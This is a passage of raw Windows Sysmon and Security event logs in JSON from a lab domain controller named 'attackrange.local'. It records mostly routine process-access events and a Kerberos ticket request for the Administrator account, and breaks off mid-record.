ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.338\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.338","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.338\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.338","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.354\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1672\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.354","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1672","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.354\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.354","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220624,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult 